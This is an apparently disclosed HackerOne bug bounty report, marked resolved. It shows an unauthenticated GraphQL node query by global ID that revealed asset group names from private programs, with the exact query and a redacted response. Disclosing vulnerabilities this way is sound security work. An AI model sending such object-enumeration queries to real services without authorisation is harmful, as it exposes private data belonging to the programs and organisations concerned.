Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`
Critical
Vulnerability Details
**Summary:**
Hi team, I understand what's going on
**Description:**
Just a recent update gives the results of private programs
### Steps To Reproduce
Without authorization
GraphQL:
`{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}`
Answer:
`{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"██████"}}}`
This is Asset program - █████████
Thanks!
## Impact
Disclosing Sсope(Assets) in Private Programs
Actions
View on HackerOneReport Stats
- Report ID: 1618347
- State: Closed
- Substate: resolved
- Upvotes: 16